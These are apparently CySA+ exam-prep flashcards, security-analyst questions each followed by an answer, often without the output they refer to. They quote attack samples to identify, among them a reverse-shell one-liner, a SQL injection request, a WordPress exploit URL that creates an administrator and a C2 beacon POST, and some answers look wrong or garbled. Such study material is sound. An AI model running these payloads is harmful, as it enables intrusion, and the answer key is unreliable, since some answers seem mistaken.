CySA Prep Flashcards
A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
Validation
The analyst reviews the following endpoint log entry:
invoke-command -ComputerName clientcomputer1 -Credential
Which of the following has occured?
New account introduced
A security program was able to achieve a 30% improvement in MTTR by integrating security controls in a SIEM. The analyst no longer had to jump between tools.
Which of the following best describes what the security program did?
Single pane of glass
Due to reports of unauthorized activity that was occurring on the internal network, and analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:
Which of the following choices should the analyst look at first?
p4wnp1_aloa.Ian (192.168.86.56)
When starting an investigation, which of the following must be done first?
Secure the scene
New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy.
Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?
All new employees must sign a user agreement to acknowledge the company security policy.
An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft.
Which of the following would be the best threat intelligence source to learn about this new campaign?
Information sharing organization
An incident response team finished responding to a significant security incident. The management team asked the lead analyst to provide an after-action report that includes lessons learned.
Which of the following is the most likely reason to include lessons learned?
To identify areas of improvement in the incident response process
A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities. Additionally, the vulnerability team feels the the metrics Smear and Channing are less important than the others, so these will be lower in priority.
Which of the following vulnerabilities should be patches first, given the third-party scoring system?
TSpirit:
Cobain: Yes
Grohl: Yes
Novo: Yes
Smear: No
Channing: No
A user downloads software that contains malware onto a computer that eventually infects numerous other systems.
Which of the following has the user become?
Insider Threat
An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network.
Which of the following should the CSIRT conduct next?
Take a snapshot of the compromised server and verify its integrity.
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?
Running processes
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region.
Which of the following shell script functions could help achieve the goal?
function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ‘{print$1}’).origin.asn.cymru.com TXT +short }
A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?
function x() { info=$(geoiplookup $1) && echo “$1 | $info” }
A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment.
Which of the following should be completed first to remediate the findings?
Perform proper sanitization on all fields
A recent zero-day vulnerability is being actively exploited, requires no user interaction of privilege escalation, and has a significant impact to confidentiality and integrity but not to availability.
Which of the following CVE metrics would be the most accurate for this zero-day threat?
CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
Which of the following tools would work best to prevent the exposure of PII outside of an organization?
DLP
An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:
Which of the following tuning recommendations should the security analyst share?
Block requests without an X-Frame-Options header
Which of the following items should be included in a vulnerability scan report? (Choose two.)
-Affected Hosts
-Risk Score
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released.
Which of the following would best protect this organization?
A mean time to respond of 15 days.
A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following output:
Get-
Add-
Set-
Which of the following scripting languages was used in the script?
PowerShell
A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS.
Which of the following most likely describes the observed activity?
An on-path attack is being performed by someone with internal access that forces users into port 80.
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst.
Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?
SLA
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
Command and control
A company that has a geographically diverse workforce and dynamic IP’s wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?
Agent-based
A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$I
Which of the following is being attempted?
Reverse shell
An older CVE with vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?
Weaponization
An analyst is reviewing a vulnerability report for a server environment with the following entries:
54.74.110.228
Crown jewel: Yes
Exploit available: Yes
Which of the following systems should be prioritized for patching first?
54.74.110.228
A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:
- Company uses CVSSv3.1 scoring metrics
- prioritize Confidentiality over availability
- public > internal systems
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?
Name: CAP.SHIELD -
CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
Disaster recovery plan
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?
Deploy a CASB and enable policy enforcement
(cloud access security broker)
An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in the multiple locations from accessing external SaaS resources The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?
DNS
A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?
Exploitation
An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external=facing assets. Which of the following steps of an attack framework is the analyst witnessing?
Reconnaissance
An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two)
-Social engineering attack
-Obfuscated links
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?
Use application security scanning as part of the pipeline for the CI/CD flow.
(continuous integration/continuous delivery)
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgrades with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best respresent?
Proprietary systems
A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?
Agent-based scanning
A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?
function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ‘{print$1}’).origin.asn.cymru.com TXT +short) && echo “$1 | $info” }
There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?
Improve employee training and awareness
Which of the following is the best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach?
Determine the sophistication of the audience that the report is meant for
A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?
Upload the binary to an air gapped sandbox for analysis
Which of the following would help to minimize human engagement and aid in process improvement in security operations?
SOAR
(security orchestration, automation, and response)
After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?
Avoid
Which of the following is an important aspect that should be included in the lessons-learned step after an incident?
Identify any improvements or changes in the incident response plan or procedures
The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?
Single pane of glass
Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?
MITRE ATT&CK
nmap -p80 –script http-unsafe-output-escaping 172.31.15.2
The security team reviews a web server for XSS and runs the following Nmap scan:
Characters [> “ ‘] reflected in parameter id at http://172.31.15.2/1php?id=2
Which of the following most accurately describes the result of the scan?
The vulnerable parameter and characters > and “ with a a reflected XSS attempt
Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?
Schedule a review with all teams to discuss what occurred
A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?
Reverse engineering
An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?
Malicious files
which of the following security operations tasks are ideal for automation?
Email header analysis:
Check the email header for a phishing confidence metric greater than or equal to five
Add the domain of sender to the block list
Move the email to quarantine
An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?
Card issuer
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
Mean time to detect
A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?
Cloud-specific misconfigurations may not be detected by the current scanners.
A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temp files, reflecting the web searches from the user’s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?
Ensure that the case details do not reflect any user-identifiable information, Password protect the evidence and restrict access to personnel related to the investigation
Which of the following is the first step that should be performed when establishing a disaster recovery plan?
Agree on the goals and objectives of the plan
Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?
The lead should review what is documented in the incident response policy or plan
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?
Indicators of Compromise
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?
Beaconing
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?
Change the display filter to ftp-data and follow the TCP streams.
An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?
Eradication
Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?
Perform no action until HR or legal counsel advises on next steps
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?
Reduce the administrator and privileged access accounts
During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?
Clone the virtual server for forensic analysis
systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from on of the server to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?
C2 beaconing activity
(Command and control)
A software developer is correcting the error-handling capabilities of an application following the initial coding of the fix.
Which of the following would the software developer MOST likely performed to validate the code prior to pushing it to production?
Static analysis
Forming a hypothesis, looking for indicators of compromise, and using the findings to proactively improve detection capabilities are examples of the value of:
threat hunting
Which of the following BEST explains the function of a managerial control?
To create data classification, risk assessments, security control reviews, and contingency planning.
Which of the following types of controls defines placing an ACL on a file folder.
Technical control
A code review reveals a web application is using time-based cookies for session management. This is a security concern because time-based cookies are easy to:
parameterize
A security analyst discovers suspicious host activity while performing monitoring activities. The analyst pulls a packet capture for the activity and sees the following:
Follow the TCP stream:
Post /210/gate.php HTTP/1.1
Host: utoftor.com
Which of the following best describes what has occurred?
The host downloaded an application from utoftor.com
A security analyst is reviewing the following Internet usage trend report:
User 1 Wk10-58GB Wk9-51GB Wk8-59GB Wk7-55GB
User 2 Wk10-185GB Wk9-97GB Wk8-87GB Wk7-92GB
User 3 Wk10-173GB Wk9-157GB Wk8-197GB Wk7-182GB
User 4 Wk10-38GB Wk9-46GB Wk8-29GB Wk7-41GB
Which of the following usernames should the security analyst investigate
User 2
A consultation evaluating multiple threat intelligence leads to assess potential risks for a client. Which of the following is the BEST approach for the consultant to consider when modeling the client’s attack surface?
Look at attacks against similar industry peers and assess the probability of the same attacks happening.
Which of the following, BEST explains the function of TPM?
To provide hardware-based security features using unique keys
An analyst determines a security incident has occurred. Which of the following is the most appropriate NEXT step in an incident response plan?
Consult the communications plan
A company’s application development has been outsourced to a third-party development team. Based on the SLA, the development team must follow industry best practices for secure coding. Which of the following is the BEST way to verify this agreement?
Application fuzzing
A security administrator needs to provide access from partners to an Isolated lab network inside an organization that meets the following requirements:
-partners PCs must not connect directly to the lab network
-tools the partners need to access while on the lab network must be available to all partners
-partners must be able to run analyses on the lab network, which may take hours to complete.
Which of the following capabilities will MOST likely meet the security objectives of the request?
Deployment of a jump box to allow access to the laboratory network and use of VDI in persistent mode to provide the necessary tools for analyses.
Which of the following are the MOST likely reasons to include reporting processes when updating an incident response plan after a breach? (Select TWO)
- To establish a clear chain of command
- To meet regulatory requirements for timely reporting
Which of the following is MOST dangerous to the client environment during a vulnerability assessment penetration test?
The testing is outside the contractual scope
Which of the following is MOST important when developing a threat hunting program?
Understanding security software technologies
A cybersecurity analyst needs to harden a server that is currently being used as a web server. The server needs to be accessible when entering www.company.com into the browser. Additionally, web pages require frequent updates, which are performed by a remote contractor. Given the following output:
Starting Nmap 7.12 ( https://nmap.org ) at 2020-08-25 11:44
Nmap scan report for finance-server (72.56.70.94)
Host is up
Not shown: 995 closed ports
Which of the following should the cybersecurity analyst recommend to harden the server? (Choose two)
-Uninstall the DNS service
-Disable the Telnet service
Which of the following BEST describes HSM?
A computing device that manages digital keys, performs, encryption/decryption functions, and maintains other cryptographic function
(HSM=Hardware Security Module)
A threat hunting team received a new IoC from an ISAC that follows a threat actor’s profile and activities. Which of the following should be updated NEXT?
The IDS signature
Which of the following BEST describes what an organizations incident response plan should cover regarding how the organization handles public or private disclosures of an incident?
The disclosure section should contain the organizations legal and regulatory requirements regarding disclosures.
An IT security analyst has received an email alert regarding a vulnerability within the new fleet of vehicles the company recently purchased. Which of the following attack vectors is the vulnerability MOST likely targeting?
CAN.bus
After examining a header and footer file, a security analyst begins reconstructing files by scanning the raw data bytes of a hard disk and rebuilding them. Which of the following techniques is the analyst using?
File carving
An organization is experiencing security incidents in which a systems admin is creating unauthorized user accounts… below is one of the scripts:
cat /etc/passwd > daily_$ (date +”%m_%d_%Y)
Which of the following commands would provide the analyst with additional useful information relevant to the above script?
diff daily_11_03_2019 daily_11_04_2019
A company’s domain has been spooled in numerous phishing campaigns. An analyst needs to determine the company is a victim of domain spoofing, despite having a DMARC record that should tell mailbox providers to ignore any email that fails DMARC upon review of the record, the analyst finds the following:
p=none
Which of the following BEST explains the reason why the company’s requirements are not being processed correctly by mailbox providers?
The DMARC record’s policy tag is incorrectly configured.
Which of the following BEST explains the function of trusted firmware updates as they relate to hardware assurance?
Trusted firmware updates provide organizations with secure code signing, distribution, installation, and attestation for embedded devices.
A help desk technician inadvertently sent the credentials of the company’s CRM in clear text to an employee’s personal email account. The technician then reset the employee’s account using the appropriate process and the employee’s corporate email, and notified the security team of the incident. According to the incident response procedure, which of the following should the security team do NEXT?
Prepare an incident summary report
A developer downloaded and attempted to install a file transfer application in which the installation package is bundle with adware. The next-generation antivirus software prevented the file from executing, but it did not remove the file from the device. Over the next few days, more developers tried to download and execute the offending file. Which of the following changes should be made to the security tools to BEST remedy the issue?
Block the download of the file via the web proxy
After detecting a possible malicious external scanning, an internal vulnerability scan was performed, and a critical server was found with an outdated version of JBoss. A legacy application that is running depends on that version of JBoss. Which of the following actions should be taken FIRST to prevent server compromise and business disruption at the same time?
Create a proper DMZ for outdated components and segregate the JBoss server.
An incident response team detected malicious software that could have gained access to credit card data. The incident response team was able to mitigate significant damage an implement corrective actions by having incident response mechanisms in place. Which of the following should be notified for lessons learned?
Company leadership
in SIEM software, a security analysis selected some changes to hash signatures from monitored files during the night followed by SMB brute-force attacks against the file servers. Based on this behavior, which of the following actions should be taken FIRST to prevent a more serious compromise?
Full segregate the affected servers physically in a network segment, apart from the production network.
While implementing a PKI for a company, a security analyst plans to utilize a dedicated server as the certificate authority that is only used to sign intermediate certificates. Which of the following are the MOST secure states for the certificate authority server when it is not in use? (Choose two)
- Full disk encrypted
-Air gapped
Which of the following BEST identifies the appropriate use of threat intelligence as a function of detection and response?
To identify likely attack scenarios within an organization
While conducting a cloud assessment, a security analyst performs a Prowler scan, which generates the following within the report:
FAIL! User BusinessUsr has never used access key 1 and not rotated it in 30 days
Based on the Prowler report, which of the following is the BEST recommendation?
Delete BusinessUsr access key 1.
An internally developed file-monitoring system identified the following except as causing a program to crash often:
char filedata[100];
fp = fopen(‘access.log’, ‘r’);
srtcopy (filedata, fp);
printf (‘%s\n’, filedata);
Which of the following should a security analyst recommend to fix the issue?
Replace the strcpy function
An organization has the following policy statements:
-All emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized coolant.
-All network activity will be logged and monitored.
-Confidential data will tagged and tracked.
-Confidential data must never be transmitted in an unencrypted form.
-Confidential data must never be stored on an unencrypted mobile device.
Which of the following is the organization enforcing?
Data management policy
A CEO is concerned the company will be exposed to data sovereignty issues as a result of some new privacy regulations to help mitigate this risk. The CISO wants to implement an appropriate technical control. Which of the following would meet the requirement?
Geographic access requirements
A security analyst needs to provide the development team with secure connectivity from the corporate network to a three-tier cloud environment. The developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the analyst implement to provide secure transport?
VPN
A security analyst found an old version of OpenSSH running on a DMZ server and determined the following piece of code could have led to a command execution through an integer overflow:
nresp = packet_get_inf ();
if (nresp > 0) {
Which of the following controls must be in place to prevent this vulnerability?
Use built-in functions from libraries to check and handle long numbers properly.
A cyber-security analyst is implementing a new network configuration on an existing network access layer to prevent possible physical attacks. Which of the following BEST describes a solution that would apply and cause fewer issues during the deployment phase?
Implement port security with one MAC address per network port of the switch.
A security analyst at example.com receives SIEM alert for an IDS signature and review the associated packet capture and TCP stream:
Which of the following actions should the security analyst take next?
Contact the application owner for connect.example.local for additional information
A security analyst needs to provide a copy of a hard drive for forensic analysis. Which of the following would allow the analyst to perform the task?
dd if=/dev/sda of=/mnt/usb/evidence.bin bs=4096; sha512sum /mnt/usb/evidence.bin > /mnt/usb/evidence.bin.hash
While monitoring the information security notification mailbox, a security analyst notices several emails were reported as spam. Which of the following should the analyst do FIRST?
Review the message in a secure environment
Company A is in the process of merging with company B. As part of the merger, connectivity between the ERP systems must be established so pertinent financial information can be shared between the two entities. Which of the following will establish a more automated approach to secure data transfers between the two entities?
Set up a VPN between Company A and Company B, granting access only to the ERPs within the connection.
A company has alerted planning the implemented a vulnerability management procedure. However, the security maturity level is low, so there are some prerequisites to complete before risk calculation and prioritization. Which of the following should be completed first?
A risk identification process
A security team implemented a SIEM as part of its security monitoring program. There is a requirement to integrate a number of sources into the SIEM to provide better context relative to the events being processed. Which of the following BEST describes the results of the security teams hopes to accomplish by adding these sources?
Data enrichment
A security analyst is investigating an incident related to an alert from the threat detection platform on a host 10.0.1.25 in a staging environment that could be running a cryptomining tool because it is sending traffic to an IP address that is related to Bitcoin.
Which of the following is the BEST way to isolate and triage the host?
Remove rules 1, 2, and 5
An analyst is reviewing the following output as part of an incident:
Length=10
Length=15
Which of the following is MOST likely happening?
Information is leaking from the memory of host 10.20.30.40
The CISO of a large financial institution is seeking a solution that will block a predetermined set of data point from being transferred or downloaded by employees. The CISO also wants to track the data assets by name, type, content, or data profile.
Which of the following best describes what the CIS wants to purchase?
DLP
The majority of a company’s employees have stated they are unable to perform their job duties due to outdated workstations, so the company has decided to institute BYOD. Which of the following would a security analyst MOST likely recommend for securing the proposed solution?
802.1X to enforce company policy on BYOD user hardware.
The help desk is having difficulty keeping up with all the onboarding and offboarding requests. Managers often submit requests for new users at the last minute causing the help desk to scramble to create accounts across many different interconnected systems. Which of the following solutions would work BEST to assist the help desk with the onboarding and offboarding process while protecting the company’s assets?
SSO
A security analyst is concerned the number of security incidents being reported has suddenly gone down. Daily business interactions have not changed, and no additional security controls have been implemented. Which of the following should the analyst review FIRST?
The IDS rule set.
A developer is working on a program to convert user-generated input in a web form before it is displayed by the browser. This technique is referred to as:
output encoding
A vulnerability scanner has identified an out-of-support database software version running on a server. The software update will take six to nine months to complete. The management team has agreed to a one year extended support contract with the software vendor. Which of the following BEST describes the risk treatment in this scenario?
The company is accepting the inherent risk of the vulnerability.
Which of the following is an advantage of SOAR over SIEM?
SOAR reduces the amount of human intervention required
Which of the following factors would determine the regulations places on data under data sovereignty laws?
The data laws of the country in which the company is located.
An organization’s internal department frequently uses a cloud provider to store large amounts of sensitive data. A threat actor has deployed a virtual machine to attack another virtual machine to gain access to the data. Through the use of the cloud host’s hypervisor, the threat actor has escalated the access rights. Which of the following actions would be BEST to remediate the vulnerability the attacker has used to exploit the system?
Update to the secure hypervisor version.
An online gaming company was impacted by a ransomware attack. An employee opened an attachment that was received via an SMS attack on a company-issue firewall. Which of the following actions would help during the forensic analysis of the mobile device? (Choose two)
- Documenting the respective chain of custody
- Performing a memory dump of the mobile device for analysis
A security analyst is reviewing a firewall usage report that contains traffic generated over the last 30 minutes in order to locate unusual traffic patterns:
Source IP Destination IP Application Bytes Sessions
192.168.48.147 192.168.31.1 Web browsing 5.3Gb 86
Which of the following IP addresses does the analyst need to investigate further?
192.168.48.147
During the threat modeling process for a new application that a company is launching, a security analyst needs to define methods and items to take into consideration.
Which of the following are part of a known threat modeling method?
Spoofing tampering, repudiation, information disclosure, denial of service, elevation of privilege
A chief Information Security Officer has asked for a list of hosts that have critical and high severity findings as referenced in the CVE database. Which of the following tools would produce the assessment output needed to satisfy this request?
Nessus
An organization wants to implement a privileged access management solution to better manage the use of emergency and privileged service accounts. Which of the following would BEST satisfy the organization’s goal?
Policy-based access controls
A security analyst is deploying a new application in the environment. The application needs to be integrated with several existing applications that contain SPI. Prior the the deployment, the analyst should conduct:
An application stress test
A manufacturing company uses a third-party service provider for Tier 1 security support. One of the requirements is that the provider must only source talent from its own country due to geopolitical and national security interests. Which of the following can the manufacturing company implement to ensure the third-party service provider meets this requirement?
Implement a secure supply chain program with governance.
Which of the following APT adversary archetypes represent the non-station-state actors? (Select TWO)
- Jackal
- Spider
A security analyst was transferred to an organization’s threat hunting team to track specific activity throughout the enterprise environment. The analyst must observe and assess the number of times this activity occurs and aggregate the results. Which of the following is the BEST threat hunting method for the analyst to use?
Stack counting
A security officer needs to find the most cost effective solution to the current data privacy and protection gap found in the latest security assessment. Which of the following is the BEST recommendation?
Create a data minimization plan
An analyst is responding to an incident within a cloud infrastructure. Based on the logs and traffic analysis, the analyst thinks a container has been compromised. Which of the following should the analyst do FIRST?
Isolate the container from production using a predefined policy template.
A security analyst sees the following OWASP ZAP output from a scan that was performed against a modern version of Windows while testing for client-side vulnerabilities:
Web Browser XSS Protection not enabled
Which of the following is the MOST likely solution to the listed vulnerability?
Enable the browser’s XSS filter
During the security assessment of a new application, a tester attempts to log in to the application but receives the following message incorrect password for given username. Which of the following can the tester recommend to decrease the likelihood that a malicious attacker will receive helpful information?
Recognize that error messaging does not provide confirmation of the correct element of authentication.
An organization has the following risk mitigation policies:
-Risks without compensating controls will be mitigated first if the risk value is greater than $50,000.
-Other risk mitigation will be prioritized based on risk value.
Risk Probability Impact Compensating control?
A 80% 100,000 Y
B 20% 500,000 Y
C 50% 120,000 Y
D 40% 80,000 N
Which of the following is the order of priority for risk mitigation from highest to lowest?
C, B, A, D
During a review of SIEM alerts, a security analyst discovers the SIEM is receiving many alerts per day from the file-integrity monitoring tool about files from a newly deployed application that should not change. Which of the following steps should the analyst complete FIRST to respond to the issue?
Check if temporary files are being monitored
Which of the following is a difference between SOAR and SCAP?
SOAR has a wider breadth of capability using orchestration and automation, while SCAP is more limited in scope.
A security analyst is reviewing WAF alerts and sees the following request:
Request=”GET /public/report.html?iewt=9064 AND 1=1 UNION ALL SELECT 1,NULL, table_name FROM information_schema.tables WHERE 2>1–/**/; HTTP/1.1 Host=mysite.com
Which of the following BEST describes the attack?
SQL injection
A security analyst is reviewing the output of tcpdump to analyze the type of activity on a packet capture:
port scan against 442-446 ports
Which of the following generated the above output?
a port scan
During routine monitoring a security analyst identified the following enterprise network traffic:
Source Destination Protocol
192.168.12.21 209.132.177.50 TCP
Which of the following BEST describes what the security analyst observed?
192.168.12.21 made a TCP connection to 209.132.177.50
AN analyst is responding to an incident involving an attack on a company-owned mobile device that was being used by an employees to collect data from clients in the field. Malware was loaded on the device via the installation of a third-party package. The analyst has baselined the device. Which of the following should the analyst do to BEST mitigate future attacks?
Implement MDM
(Mobile Device Management)
Some hard disks need to be taken as evidence for further analysis during an incident response. Which of the following procedures must be completed FIRST for this type of evidence acquisition?
Build the chain-of-custody document, noting the media model, serial number, size, vendor, date, and time of acquisition.
Which of the following is the software development process by which function, usability, and scenarios are test against a known set of base requirements?
User acceptance testing
An organization wants to ensure the privacy of the data that is on its systems. Full disk encryption and DLP are already in use. Which of the following is the BEST option?
Enforce geofencing to limit data accessibility.
A company wants to configure the environment to allow passive network monitoring. To avoid disrupting the sensitive network, which of the following must be supported by the scanner’s NIC to assist with the company’s request?
port mirroring
Due to a rise in cyber attackers seeking PHI, a healthcare company that collects highly sensitive data from millions of customers is deploying a solution that will ensure the customer’s data is protected by the organization internally and externally. Which of the following countermeasures can BEST prevent the loss of the customer’s sensitive data?
Implement multifactor authentication
A company’s security team recently discovered a number of workstations that are at the end of life. The workstation vender informs the team that the product is no longer supported and patches are no longer available. The company is not prepared to cease its use of these workstations. Which of the following would be the BEST method to protect these workstations from threats?
Isolate the workstations and air gap them when it is feasible.
During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in confirmed malware activity. The analyst also noted there is no other alert in place for this traffic. After resolving the security incident, which of the following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?
Communicate the security incident to the threat team for further review and analysis
A company uses an FTP server to support its critical business functions. The FTP server is configured as follows:
-The FTP service is running with the data directory configured in /opt/ftp/data.
-The FTP server hosts employees’ home directories in /home
-Employees may store sensitive information in their home directories
An IoC revealed that an FTP directory traversal attack resulted in sensitive data loss. Which of the following should a server administrator implement to reduce the risk of current and future directory traversal attacks targeted at the FTP server?
Run the FTP server in a chroot environment
A company offers a hardware security appliance to customers that provides remote administration of a device on the customer’s network. Customers are not authorized to alter the configuration. The company deployed a software process to manage unauthorized changes to the appliance log, and forward them to a central repository for evaluation. Which of the following processes is the company using to ensure the appliance is not altered from its original configured state?
Change management
A security analyst is investigating a reported phishing attempt that was received by many users throughout the company. The text of one of the emails is shown below:
Due to the size of the company and the high storage requirements, the company does not log DNS requests or perform packet captures of network traffic, but it does log network flow data. Which of the following commands will the analyst most likely execute NEXT?
nslookup accountfix-office365.com
A company’s legal and accounting teams have decided it would be more cost-effective to offload the risks of data storage to a third party. The IT management team has decided to implement a cloud model and has asked the security team for recommendations. Which of the following will allow all data to be kept on the third-party network?
CASB
(cloud access security broker)
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
Determine what attack the odd characters are indicative of.
A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?
Incident response plan
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
Block the IP range of the scans at the network firewall.
An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:
/wp-
json/trx_addons/V2/get/sc-layout?sc=wp_insert_user&role=administrator
Which of the following controls would work best to mitigate the attack represented by this snippet?
Limit user creation to administrators only
A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?
Performing input validation before allowing submission
A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?
Mean time to contain
An employee access a website that caused a device to become infected with invasive malware. The incident response analyst has:
-created the initial evidence log
-disabled the wireless adapter on the device.
-interviewed the employee, who was unable to identify the website that was accessed.
-reviewed the web proxy traffic logs.
Which of the following should the analyst do to remediate the infected device?
Update the system firmware and reimage the hardware.
A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?
High GPU utilization
A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g. an employee who installs cryptominers on workstations in the officer). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?
Legal department
Given the following CVSS string:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Which of the following attributes correctly describes this vulnerability?
The vulnerability is network based
A cryptocurrency service company is primarily concerned with ensuring the accuracy of the data on one of its systems. A security analyst has been tasked with prioritized vulnerabilities for remediation of the system. The analyst will use the following CVSSv3.1 impact metrics for prioritization:
4 C:L/I:H/A:L
Which of the following vulnerabilities should be prioritized for remediation?
4
Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the table below:
System Name Vulnerability Network Segment
brady inter.drop external
Which of the following should the security analyst prioritize for remediation?
brady
A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?
Generate a hash value and make a backup image
